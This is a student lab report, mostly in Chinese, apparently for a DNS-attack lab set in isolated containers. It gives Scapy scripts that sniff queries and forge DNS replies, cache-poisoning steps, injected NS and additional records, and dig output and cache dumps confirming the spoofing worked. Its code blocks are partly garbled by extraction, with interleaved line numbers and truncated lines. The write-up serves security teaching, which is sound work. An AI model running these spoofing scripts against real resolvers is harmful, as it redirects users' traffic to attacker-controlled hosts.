The report of lab 5

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Testing the DNS Setup

1. Get the IP address of ns.attacker32.com.

在 user 机中输入 dig 命令向本地 DNS 服务器询问 ns.attacker32.com 的 IP 地址,结果如下,可以看到通过本地 DNS 服务器可以将该域名解析到 10.9.0.153:

```
root@c7006c24cf51:/# dig ns.attacker32.com
; <>>> DiG 9.16.1-Ubuntu <>>> ns.attacker32.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41237
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: eb7b0905d8d26a850100000060f5488edbd8600e7b225666 (good)
;; QUESTION SECTION:
;ns.attacker32.com.
                                  TN
;; ANSWER SECTION:
                          259200 IN A 10.9.0.153
ns.attacker32.com.
;; Query time: 4 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 09:40:30 UTC 2021
;; MSG SIZE rcvd: 90
```

2. Get the IP address of www.example.com.

直接运行 dig 命令, 本地 DNS 服务器给出如下的结果:

```
root@3ea41db90486:/# dig www.example.com
; <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53375
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
 EDNS: version: 0, flags:; udp: 4096
; COOKIE: 0de6d60332afe3f00100000060f674c8e01c3a7b3a2c666f (good)
;; QUESTION SECTION:
;www.example.com.
                               IN
;; ANSWER SECTION:
                       86400 IN A 93.184.216.34
www.example.com.
;; Query time: 4292 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 07:01:28 UTC 2021
;; MSG SIZE rcvd: 88
```

指定恶意 DNS 服务器进行 dig, 能够得到伪造的目标域名的 IP 地址:

```
root@3ea41db90486:/# dig @ns.attacker32.com www.example.com
; <>>> DiG 9.16.1-Ubuntu <>>> @ns.attacker32.com www.example.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19742
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
  EDNS: version: 0, flags:; udp: 4096
 COOKIE: 7f825dcb8b818a350100000060f674fbac61e08d88dfb234 (good)
;; QUESTION SECTION:
;www.example.com.
                                   IN
;; ANSWER SECTION:
www.example.com.
                          259200 IN
                                                     1.2.3.5
;; Query time: 0 msec
;; SERVER: 10.9.0.153#53(10.9.0.153)
;; WHEN: Tue Jul 20 07:02:19 UTC 2021
   MSG SIZE rcvd: 88
```

上述测试表明本地 DNS 服务器配置正确。

Task 1: Directly Spoofing Response to User

Code:

伪造包代码:

```
    #!/usr/bin/env python3

2. from scapy.all import *
3. def spoof_dns(pkt):
4.
5.
      if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-
        print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
7.
        # Swap the source and destination IP address
8.
9.
        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
10.
11.
        # Swap the source and destination port number
12.
       UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
13.
```

```
14.
       # The Answer Section
15.
       Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
                     ttl=259200, rdata='1.2.3.4')
16.
17.
       # Construct the DNS packet
18.
19.
       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
                     qdcount=1, ancount=1,
20.
21.
                     an=Anssec)
22.
23.
       # Construct the entire IP packet and send it out
24.
       spoofpkt = IPpkt/UDPpkt/DNSpkt
25.
       send(spoofpkt)
26.
27. # Sniff UDP query packets and invoke spoof_dns().
28. f = 'udp and dst port 53'
29. pkt = sniff(iface='br-ca28f86ef23a', filter=f, prn=spoof dns)
```

先在 attack 机中运行如上伪造包代码:

```
root@VM:/volumes# python3 spoof.py
```

然后在 user 机上 dig www.example.com,得到如下回复:

```
root@3ea41db90486:/# dig www.example.com
; <>>> DiG 9.16.1-Ubuntu <>>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52425
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
 EDNS: version: 0, flags:; udp: 4096
; COOKIE: b69509c9b9e5fc490100000060f67622cb1227472b52b274 (good)
;; QUESTION SECTION:
;www.example.com.
                                    IN
;; ANSWER SECTION:
                           86054
                                    IN
                                                     93.184.216.34
www.example.com.
;; Query time: 0 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 07:07:14 UTC 2021
;; MSG SIZE rcvd: 88
```

这说明我们的伪造数据包到达 user 机慢于真实的回应包,通过提高本地 DNS 的数据延迟来解决:

```
root@9e59ae4605ca:/# tc qdisc add dev eth0 root netem delay 100ms
root@9e59ae4605ca:/#
```

再次在 user 机上 dig www.example.com,得到如下回复,为我们伪造的报文信息,该域名被映射到了 1.2.3.4:

```
root@3ea41db90486:/# dig www.example.com
; <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65329
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.example.com.
                               IN
                                       Α
;; ANSWER SECTION:
www.example.com.
                       259200 IN
                                       Α
                                               1.2.3.4
;; Query time: 60 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 07:09:22 UTC 2021
;; MSG SIZE rcvd: 64
```

攻击程序打印内容如下:

```
root@VM:/volumes# python3 spoof.py
10.9.0.5 --> 10.9.0.53: 52425
.
Sent 1 packets.
10.9.0.5 --> 10.9.0.53: 65329
.
Sent 1 packets.
```

Task 2: DNS Cache Poisoning Attack – Spoofing Answers

Code:

包伪造代码如下,与 task1 相比只是把 sniff 的网段改到 10.8.0.0/24, 捕获修改的是本地 DNS 向外发出的报文:

```
1. #!/usr/bin/env python3
2. from scapy.all import *
3. def spoof_dns(pkt):
4.
5.  if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):
6.  print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
7.
8.  # Swap the source and destination IP address
9.  IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
10.
```

```
11.
       # Swap the source and destination port number
12.
       UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
13.
       # The Answer Section
14.
       Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
15.
                     ttl=259200, rdata='1.2.3.4')
16.
17.
       # Construct the DNS packet
18.
19.
       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
20.
                     qdcount=1, ancount=1,
21.
                     an=Anssec)
22.
23.
       # Construct the entire IP packet and send it out
       spoofpkt = IPpkt/UDPpkt/DNSpkt
24.
25.
       send(spoofpkt)
26.
27. # Sniff UDP query packets and invoke spoof_dns().
28. f = 'udp and dst port 53'
29. pkt = sniff(iface='br-84bdf3594d21', filter=f, prn=spoof_dns)
```

首先使用如下命令清除本地 DNS 服务器中的缓存:

```
root@9e59ae4605ca:/# rndc flush root@9e59ae4605ca:/#
```

然后在 attack 机上运行 Code 部分的包伪造代码:

```
root@VM:/volumes# python3 spoof.py
```

之后在 user 机上使用 dig 命令询问 www.example.com 的 IP 地址,收到的回应 DNS 包如下:

```
root@3ea41db90486:/# dig www.example.com
; <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63098
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
 EDNS: version: 0, flags:; udp: 4096
 COOKIE: 6be77b19d953b7a00100000060f6781af4cdaa2f00c9a864 (good)
;; QUESTION SECTION:
;www.example.com.
                                IN
                                        Α
;; ANSWER SECTION:
www.example.com.
                        259200 IN
                                                1.2.3.4
                                        Α
;; Query time: 3024 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 07:15:38 UTC 2021
;; MSG SIZE rcvd: 88
```

在本地 DNS 服务器中利用如下两条命令进行缓存转储并显示:

```
root@9e59ae4605ca:/# cat /var/cache/bind/dump.db | grep www.example.com
www.example.com. 863985 A 1.2.3.4
root@9e59ae4605ca:/#
```

截图显示本地服务器上已经缓存了 www.example.com 映射到 1.2.3.4 的记录。

Task 3: Spoofing NS Records

Code:

代码中增加了 authority section 的部分,将 example.com 的权威服务器设定为恶意 DNS 服务器 ns.attacker32.com:

```
    #!/usr/bin/env python3

2. from scapy.all import*
3. def spoof_dns(pkt) :
4.
       if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-
5.
    8')):
            print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
6.
7.
8.
            # Swap the sourceand destination IP address
9.
            IPpkt = IP(dst = pkt[IP].src, src = pkt[IP].dst)
10.
11.
            # Swap the source and destination port number
            UDPpkt = UDP(dport = pkt[UDP].sport, sport = 53)
12.
13.
14.
            # The Answer Section
15.
            Anssec = DNSRR(rrname = pkt[DNS].qd.qname, type = 'A',
                ttl = 259200, rdata = '1.2.3.4')
16.
17.
18.
            # The Authority Section
19.
            NSsec = DNSRR(rrname = 'example.com', type = 'NS',
20.
                ttl = 259200, rdata = 'ns.attacker32.com')
21.
22.
            # Construct the DNS packet
23.
            DNSpkt = DNS(id = pkt[DNS].id, qd = pkt[DNS].qd, aa = 1, rd = 0, qr
    = 1,
```

```
24.
                qdcount = 1, ancount = 1, nscount = 1,
25.
                an = Anssec, ns = NSsec)
26.
            # Construct the entire IP packet and send it out
27.
            spoofpkt = IPpkt / UDPpkt / DNSpkt
28.
29.
            send(spoofpkt)
30.
           # Sniff UDP query packets and invoke spoof_dns().
31.
32.
            f = 'udp and dst port 53'
            pkt = sniff(iface = 'br-
33.
   84bdf3594d21', filter = f, prn = spoof dns)
```

首先使用如下命令清除本地 DNS 服务器中的缓存:

```
root@9e59ae4605ca:/# rndc flush
root@9e59ae4605ca:/#
```

然后在 attack 机上运行 Code 部分的包伪造代码:

```
root@VM:/volumes# python3 spoof.py
```

之后在 user 机上使用 dig 命令询问 www.example.com 的 IP 地址,收到的回应 DNS 包如下

```
root@3ea41db90486:/# dig www.example.com
 <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28837
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
  EDNS: version: 0, flags:; udp: 4096
 COOKIE: ec996eea795f80e50100000060f67ad75e4ca754994e6359 (good)
;; QUESTION SECTION:
;www.example.com.
                                    IN
;; ANSWER SECTION:
www.example.com.
                           259200 IN
                                                      1.2.3.4
;; Query time: 1092 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 07:27:19 UTC 2021
;; MSG SIZE rcvd: 88
```

在本地 DNS 服务器中利用如下两条命令进行缓存转储并显示:

```
root@9e59ae4605ca:/# rndc dumpdb -cache
root@9e59ae4605ca:/# cat /var/cache/bind/dump.db | grep example
example.com. 777590 NS ns.attacker32.com.
www.example.com. 863992 A 1.2.3.4
```

表明我们成功将恶意 DNS 服务器写进了缓存,接下来进行测试,方式是在 user 机上 dig 一个其他的 example.com 系列域名,这里取了 mail.example.com 进行测试,发现该域名被恶意 DNS 服务器映射到了 1.2.3.6 这样一个不正常的 IP 地址上:

```
root@3ea41db90486:/# dig mail.example.com
; <>>> DiG 9.16.1-Ubuntu <<>> mail.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16722
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 8f4465fbc99d9a9601000000060f67dca56bbeb7ee4cc9b7e (good)
;; QUESTION SECTION:
;mail.example.com.
;; ANSWER SECTION:
mail.example.com.
                                                     1.2.3.6
                          259200 IN
;; Query time: 312 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
   WHEN: Tue Jul 20 07:39:55 UTC 2021
;; MSG SIZE rcvd: 89
```

Task 4: Spoofing NS Records for Another Domain

Code:

与 Task2 代码基本一致,增加了一条 NSsec 用来指定 google.com 的权威服务器:

```
    #!/usr/bin/env python3

2. from scapy.all import *
3. def spoof_dns(pkt):
4.
5.
      if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-
        print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
6.
7.
        # Swap the source and destination IP address
9.
        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
10.
11.
        # Swap the source and destination port number
       UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
12.
13.
14.
        # The Answer Section
15.
        Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
16.
                     ttl=259200, rdata='1.2.3.4')
17.
```

```
18.
       # The Authority Section
19.
       NSsec1 = DNSRR(rrname='example.com', type='NS',
20.
                       ttl=259200, rdata='ns.attacker32.com')
21.
       NSsec2 = DNSRR(rrname='google.com', type='NS',
                       ttl=259200, rdata='ns.attacker32.com')
22.
23.
24.
       # Construct the DNS packet
25.
       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
26.
                     qdcount=1, ancount=1, nscount=2,
27.
                     an=Anssec,ns=NSsec1/NSsec2)
28.
29.
        # Construct the entire IP packet and send it out
30.
       spoofpkt = IPpkt/UDPpkt/DNSpkt
        send(spoofpkt)
31.
32.
33. # Sniff UDP query packets and invoke spoof dns().
34. f = 'udp and dst port 53'
35. pkt = sniff(iface='br-84bdf3594d21', filter=f, prn=spoof_dns)
```

首先使用如下命令清除本地 DNS 服务器中的缓存:

```
root@9e59ae4605ca:/# rndc flush
root@9e59ae4605ca:/#
```

然后在 attack 机上运行 Code 部分的包伪造代码:

```
root@VM:/volumes# python3 spoof.py
```

之后在 user 机上使用 dig 命令询问 www.example.com 的 IP 地址,收到的回应 DNS 包如下

```
root@3ea41db90486:/# dig www.example.com
 <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32378
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
 EDNS: version: 0, flags:; udp: 4096
; COOKIE: d3eb5d9dc19611b60100000060f67f348e5cb13972f03d06 (good)
;; QUESTION SECTION:
;www.example.com.
                                 IN
;; ANSWER SECTION:
www.example.com.
                                                  1.2.3.4
                         259200 IN
                                         Α
;; Query time: 4296 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 07:45:57 UTC 2021
;; MSG SIZE rcvd: 88
```

在本地 DNS 服务器中利用如下两条命令进行缓存转储并显示,该结果显示 example.com 与 ns.attacker32.com 的对应被写进了缓存,而缓存中却没有 google.com 的 缓存内容,这是因为 user 机询问的 www.example.com 在 example.com 域中,因此本地 DNS 认为它是合法的,而它不属于 google.com 域中,因此本地 DNS 服务器认定其非法,没有进行记录:

```
root@9e59ae4605ca:/# rndc flush
root@9e59ae4605ca:/# rndc dumpdb -cache
root@9e59ae4605ca:/# cat /var/cache/bind/dump.db | grep example
example.com. 777590 NS ns.attacker32.com.
www.example.com. 863991 A 1.2.3.4
root@9e59ae4605ca:/# cat /var/cache/bind/dump.db | grep google
root@9e59ae4605ca:/#
```

Task 5: Spoofing Records in the Additional Section

Code:

伪造包代码如下, 增加了 3 条 additional section, 同时为 example.com 指定两个权威 DNS 服务器:

```
    #!/usr/bin/env python3

2. from scapy.all import *
3. def spoof_dns(pkt):
4.
     if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-
5.
    8')):
        print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
6.
7.
        # Swap the source and destination IP address
8.
9.
        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
10.
11.
        # Swap the source and destination port number
12.
        UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
13.
14.
        # The Answer Section
15.
        Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
                     ttl=259200, rdata='1.2.3.4')
16.
17.
18.
        # The Authority Section
        NSsec1 = DNSRR(rrname='example.com', type='NS',
19.
20.
                       ttl=259200, rdata='ns.attacker32.com')
21.
        NSsec2 = DNSRR(rrname='example.com', type='NS',
22.
                       ttl=259200, rdata='ns.example.com')
23.
        # The Additional Section
24.
```

```
25.
       Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A',
26.
                        ttl=259200, rdata='1.2.3.4')
27.
       Addsec2 = DNSRR(rrname='ns.example.com', type='A',
28.
                        ttl=259200, rdata='5.6.7.8')
       Addsec3 = DNSRR(rrname='www.facebook.com', type='A',
29.
30.
                        ttl=259200, rdata='3.4.5.6')
31.
       # Construct the DNS packet
32.
33.
       DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
34.
                     qdcount=1, ancount=1, nscount=2,arcount=3,
35.
                     an=Anssec,ns=NSsec1/NSsec2,ar=Addsec1/Addsec2/Addsec3)
36.
37.
       # Construct the entire IP packet and send it out
       spoofpkt = IPpkt/UDPpkt/DNSpkt
38.
39.
       send(spoofpkt)
40.
41. # Sniff UDP query packets and invoke spoof_dns().
42. f = 'udp and dst port 53'
43. pkt = sniff(iface='br-84bdf3594d21', filter=f, prn=spoof_dns)
```

首先使用如下命令清除本地 DNS 服务器中的缓存:

```
root@9e59ae4605ca:/# rndc flush
root@9e59ae4605ca:/#
```

然后在 attack 机上运行 Code 部分的包伪造代码:

```
root@VM:/volumes# python3 spoof.py
```

之后在 user 机上使用 dig 命令询问 www.example.com 的 IP 地址,收到的回应 DNS 包如下:

```
root@3ea41db90486:/# dig www.example.com
 <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45462
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
 EDNS: version: 0, flags:; udp: 4096
 COOKIE: 6881fdec2f4a0d590100000060f68525d86bd745fa5224de (good)
;; QUESTION SECTION:
                                IN
;www.example.com.
;; ANSWER SECTION:
                                                1.2.3.4
www.example.com.
                        259200 IN
                                        Α
;; Query time: 4008 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Tue Jul 20 08:11:17 UTC 2021
;; MSG SIZE rcvd: 88
```

在本地 DNS 服务器中利用如下两条命令进行缓存转储并显示:

root@9e59ae4605ca:/# rndc dumpdb -cache root@9e59ae4605ca:/# cat /var/cache/bind/dump.db

在显示内容中寻找到如下实验结果部分:

```
; authauthority example.com. 777023 NS ns.example.com. 777023 NS ns.attacker32.com.
; additional ns.example.com. 863425 A 5.6.7.8 ; authanswer www.example.com. 863425 A 1.2.3.4 root@9e59ae4605ca:/# cat /var/cache/bind/dump.db | grep facebook
```

root@9e59ae4605ca:/#
实验结果表明,通过 authority section 为 example.com 指定两个权威服务器 ns.example.com 和 ns.attacker32.com 是可行的; 而通过 additional section 提供两个指定权威服务器的 IP 地址也成功了。但关于 Facebook 的 IP 地址的指定是失败的,原因结合

task4 可以推测,因为 www.facebook.com 显然也不是 example.com 域中的域名,因此本地 DNS 服务器不会进行它的缓存记录。综上可以做出总结,本地 DNS 服务器只会处理域内的消息更新,而不会执行域外域名的信息更新。